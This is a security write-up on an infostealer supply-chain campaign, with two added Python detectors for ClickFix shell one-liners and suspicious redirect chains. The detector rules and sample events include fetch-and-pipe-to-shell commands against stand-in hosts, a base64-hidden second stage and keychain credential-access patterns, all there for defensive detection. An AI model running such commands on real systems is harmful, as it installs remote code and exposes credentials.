A cross-platform campaign tracked as RU-APT-ChainReaver-L is compromising trusted websites and GitHub repositories to distribute infostealer malware. The supply chain attack targets Windows, macOS, and iOS users and relies on validly signed payloads and deceptive redirect chains to evade detection and deliver its malware.
The campaign, identified by GRAPH analysts, has been operating for several months, and a significant volume of credentials stolen by it has appeared on dark web marketplaces. The attackers have built an infrastructure of more than 100 domains, including command-and-control servers and redirection intermediaries. The scale of that infrastructure is what turns a set of malicious downloads into a supply chain problem, and it is why the defensive measures described below have to cover the delivery path and not only the final payload.
GitHub Exploitation and Malware Capabilities
The operators compromised approximately 50 GitHub accounts. Many were long-established accounts with years of history, which lent legitimacy to the malicious repositories they were used to host. The accounts were hijacked primarily in November 2025 and repurposed to distribute cracked software and activation tools, targeting people actively searching for pirated software.
The attack methodology varies by target operating system. Windows users are redirected to cloud storage services such as MediaFire and Dropbox, where they download password-protected archives containing the malware. The archive password keeps the hosting service and scanning gateways from inspecting the payload, and the executable inside is signed with valid code-signing certificates issued to several different companies, so it passes the signature checks that traditional antivirus and endpoint detection and response (EDR) products treat as a trust signal. A valid signature only proves that the signer controlled a certificate; it does not establish that the signer is the expected publisher. Signature-based allowlisting should therefore match the signer identity against a known-publisher list rather than accept any validly signed binary.
macOS users receive “ClickFix” lures: deceptive web pages that instruct them to paste and run a terminal command, typically presented as a fix for a fabricated error. The command downloads and installs the MacSync Stealer. Because the user launches the command in Terminal themselves, the chain sidesteps the controls that act on downloaded files, such as browser download warnings and Gatekeeper checks on downloaded applications; the only artifact at the moment of infection is a shell spawned by the terminal app with a suspicious command line.
iOS users are directed to fraudulent VPN applications listed on the Apple App Store. Once installed, these apps present phishing prompts designed to harvest sensitive information from the user.
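The ClickFix chain on macOS leaves one reliable artifact: a shell, spawned by the terminal application, whose command line fetches a remote script and pipes it into an interpreter, often with a base64-encoded second stage. The following is an added example, not code from the page or from the campaign report, that scores EDR-style process events for that pattern, decoding one level of base64 and rescoring the hidden stage. The event field names, the list of terminal apps, the rule weights, and the sample events (hosts use the reserved .invalid TLD) are assumptions constructed for the example.

```python
"""Score process events for ClickFix-style one-liners.

Added example for this write-up, not code from the page or from the campaign
report. It scores command lines as an EDR might record them for the pattern a
ClickFix lure produces: a shell spawned by a terminal app that fetches a remote
script and pipes it straight into an interpreter, often via a base64 stage.
Field names, the terminal-app list, weights and the sample events are all
assumptions constructed for the example.
"""
import base64
import binascii
import re

# Heuristic rules: (description, pattern, weight). Weights are assumptions.
RULES = [
    ("remote fetch piped to shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"), 3),
    ("base64 decode piped to shell",
     re.compile(r"\bbase64\s+(-d|--decode|-D)\b[^|]*\|\s*(ba|z)?sh\b"), 3),
    ("osascript one-liner", re.compile(r"\bosascript\s+-e\b"), 2),
    ("silent or insecure curl flags",
     re.compile(r"\bcurl\b[^|]*\s-(fsSL|sSL|k|s)\b"), 1),
    ("credential access from shell",
     re.compile(r"\b(sudo\s+-S|security\s+find-generic-password)\b"), 2),
]
# Apps whose child shells run what the user pasted (assumed list).
TERMINAL_PARENTS = {"Terminal", "iTerm2", "Alacritty", "kitty"}
# Candidate base64 literals long enough to hide a second-stage command.
B64_LITERAL = re.compile(r"([A-Za-z0-9+/]{16,}={0,2})")
THRESHOLD = 3


def score_command(cmd, depth=0):
    """Return (score, reasons); decodes one level of base64 and rescores it."""
    score, reasons = 0, []
    for name, rx, weight in RULES:
        if rx.search(cmd):
            score += weight
            reasons.append(name)
    if depth == 0:
        for m in B64_LITERAL.finditer(cmd):
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not a real base64 stage (e.g. a long path segment)
            inner_score, inner_reasons = score_command(decoded, depth + 1)
            score += inner_score
            reasons += ["decoded stage: " + r for r in inner_reasons]
    return score, reasons


def flag_events(events, threshold=THRESHOLD):
    """Return [(event, score, reasons)] for events at or above threshold."""
    flagged = []
    for ev in events:
        score, reasons = score_command(ev["cmd"])
        if ev.get("parent") in TERMINAL_PARENTS:
            score += 1  # a pasted one-liner runs under the terminal app
            reasons.append("spawned from interactive terminal")
        if score >= threshold:
            flagged.append((ev, score, reasons))
    return flagged


# Constructed sample events; hosts use the reserved .invalid TLD.
STAGE2 = base64.b64encode(b"curl -s http://127.0.0.1/stage2 | sh").decode()
SAMPLE_EVENTS = [
    {"parent": "Terminal", "user": "alice",
     "cmd": "curl -fsSL https://dl.example.invalid/fix.sh | bash"},
    {"parent": "Terminal", "user": "alice",
     "cmd": f"echo '{STAGE2}' | base64 -d | sh"},
    {"parent": "Terminal", "user": "bob", "cmd": "brew install wget"},
    {"parent": "Terminal", "user": "bob",
     "cmd": "curl -s https://api.example.invalid/status -o status.json"},
    {"parent": "iTerm2", "user": "carol", "cmd": "git pull --rebase"},
]

if __name__ == "__main__":
    for ev, score, reasons in flag_events(SAMPLE_EVENTS):
        print(f"[{score}] {ev['user']}: {ev['cmd']}")
        for r in reasons:
            print("    -", r)
```

Run against the constructed events, the two pasted one-liners are flagged and the benign `brew`, plain `curl -o`, and `git` commands are not. The base64 rescoring matters because the outer command line of a staged lure often contains nothing more suspicious than `base64 -d | sh`; the decoded stage is where the remote fetch appears.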
Sophisticated Infrastructure and Evasion Tactics
Central to the campaign is its abuse of file-sharing mirror services. The attackers compromised two widely used platforms, Mirrored.to and Mirrorace.org, which many software download websites rely on to distribute files. By injecting malicious code into these trusted services, the threat actors turned legitimate infrastructure into a delivery mechanism for their infostealer.
Users who download files through the compromised services are taken through a series of redirect chains. The intermediary pages are crafted to evade security detection while keeping a legitimate appearance, so the user proceeds with the malicious download without suspicion. The attackers also modify their malware and delivery methods frequently, which defeats signature-based antivirus detection and means that indicators such as file hashes age quickly; the redirect infrastructure and the final download hosts are more durable detection points.
The Windows component is a fully featured infostealer. It captures screenshots; extracts data from cryptocurrency wallets, messenger databases, and browser credential stores; and copies files from common user directories such as Desktop, Documents, and Downloads.
The macOS MacSync Stealer runs in memory without writing its payload to disk, leaving minimal traces for forensic analysis. It collects browser data, wallet data for providers such as Ledger and Trezor, SSH keys, and AWS credentials. Because the payload never touches disk, file-based scanning misses it; detection has to rely on the command that launched it and on its process, file-access, and network behaviour.
Organizations should combine several defenses against campaigns of this kind. User education is a critical layer, since every infection chain described here depends on social engineering, but it must be backed by technical controls. Security teams should deploy multi-layered endpoint protection, including EDR configured to detect unusual process behaviour (for example, a terminal-spawned shell fetching a remote script and piping it into an interpreter) and suspicious access to credential stores and user document folders.
Network monitoring should focus on connections to file-sharing services and to newly registered domains, both common indicators in this campaign; a client that passes through several HTTP redirects, including recently registered intermediaries, and ends at a file-sharing host downloading an archive is the pattern to alert on. Restricting direct internet access for user systems and routing downloads through a file analysis platform that combines static analysis, dynamic analysis, and machine learning adds a further layer; archives that cannot be inspected because they are password-protected should be held rather than passed through. Given that the campaign is ongoing, continuous vigilance and adaptation of controls will remain necessary.
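The monitoring guidance above comes down to correlating a client's requests into a chain and scoring the chain for the traits the campaign exhibits. The following is an added example, not code from the page or from the campaign report, that rebuilds per-client request chains from Referer linkage in a proxy log and scores each chain for hops through file-sharing services, hops through newly registered domains, multiple HTTP redirects, and a final archive download. The log format, the domain-registration table, the weights, and the log lines are constructed assumptions; in production the registration dates would come from RDAP/WHOIS lookups and the registrable-domain split from a public-suffix list.

```python
"""Triage proxy logs for redirect chains that end at file-sharing hosts.

Added example for this write-up, not code from the page or the campaign
report. It rebuilds per-client request chains from Referer linkage, then
scores each chain for hops through file-sharing services, hops through newly
registered domains, several HTTP redirects, and a final archive download.
The log format, the registration table, the weights and the log lines are
constructed assumptions; in production the registration dates would come
from RDAP/WHOIS and the registrable-domain split from a public-suffix list.
"""
from datetime import date

# File-sharing services named in the report (suffix-matched on the registrable domain).
FILE_SHARING = {"mediafire.com", "dropbox.com", "mirrored.to", "mirrorace.org"}
ARCHIVE_EXT = (".rar", ".zip", ".7z")
NEW_DOMAIN_DAYS = 30
THRESHOLD = 3
NOW = date(2025, 11, 12)  # "today" for the constructed sample

# Constructed registration dates: placeholders, not real WHOIS data.
REGISTERED = {
    "crack-site.invalid": date(2025, 10, 20),
    "hop-7f3a.invalid": date(2025, 11, 1),
    "mirrored.to": date(2010, 1, 1),
    "mediafire.com": date(2010, 1, 1),
    "dropbox.com": date(2010, 1, 1),
    "github.com": date(2010, 1, 1),
}

# Constructed log: timestamp client method host path status referer_host ("-" if none).
SAMPLE_LOG = """\
2025-11-12T09:14:01Z 10.0.0.5 GET crack-site.invalid /download/tool 302 -
2025-11-12T09:14:02Z 10.0.0.5 GET mirrored.to /dl/abc123 302 crack-site.invalid
2025-11-12T09:14:03Z 10.0.0.5 GET hop-7f3a.invalid /go 302 mirrored.to
2025-11-12T09:14:04Z 10.0.0.5 GET www.mediafire.com /file/xyz/setup.rar 200 hop-7f3a.invalid
2025-11-12T09:20:00Z 10.0.0.9 GET www.dropbox.com /s/teamdoc.pdf 200 intranet.example
2025-11-12T09:21:00Z 10.0.0.9 GET github.com /org/repo 200 -
"""


def registrable(host):
    """Naive registrable domain: last two labels (no public-suffix handling)."""
    return ".".join(host.lower().split(".")[-2:])


def parse(log_text):
    rows = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, host, path, status, referer = line.split()
        rows.append({"ts": ts, "client": client, "method": method, "host": host,
                     "path": path, "status": int(status),
                     "referer": None if referer == "-" else referer})
    return rows


def build_chains(rows):
    """Link a request to the client's previous one when its Referer is that host."""
    chains, current = [], {}
    for r in rows:  # assumes the log is time-ordered
        chain = current.get(r["client"])
        if chain and r["referer"] == chain[-1]["host"]:
            chain.append(r)
        else:
            chain = [r]
            chains.append(chain)
            current[r["client"]] = chain
    return chains


def score_chain(chain, now):
    sharing = [r["host"] for r in chain if registrable(r["host"]) in FILE_SHARING]
    new_domains = []
    for r in chain:
        reg = REGISTERED.get(registrable(r["host"]))
        if reg is not None and (now - reg).days < NEW_DOMAIN_DAYS:
            new_domains.append(r["host"])
    redirects = sum(1 for r in chain if 300 <= r["status"] < 400)
    ends_in_archive = chain[-1]["path"].lower().endswith(ARCHIVE_EXT)
    score = (len(sharing) + 2 * len(new_domains)
             + (1 if redirects >= 2 else 0) + (1 if ends_in_archive else 0))
    return {"client": chain[0]["client"], "hops": len(chain), "redirects": redirects,
            "file_sharing": sharing, "new_domains": new_domains,
            "ends_in_archive": ends_in_archive, "score": score,
            "route": " -> ".join(r["host"] for r in chain)}


def triage(log_text, now, threshold=THRESHOLD):
    """Return scored chains at or above threshold, highest score first."""
    results = [score_chain(c, now) for c in build_chains(parse(log_text))]
    return sorted((r for r in results if r["score"] >= threshold),
                  key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG, NOW):
        print(f"[{hit['score']}] {hit['client']}: {hit['route']}")
        print("    file-sharing:", hit["file_sharing"], "new domains:", hit["new_domains"])
```

On the constructed log, the four-hop chain from the cracked-software site through Mirrored.to and a days-old intermediary to a `.rar` on MediaFire scores well above threshold, while the legitimate Dropbox document fetch (one hop, established domain, no redirects) stays below it. A single file-sharing connection is weak evidence on its own; the chain shape and the domain age are what separate this campaign's traffic from ordinary use of the same services.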

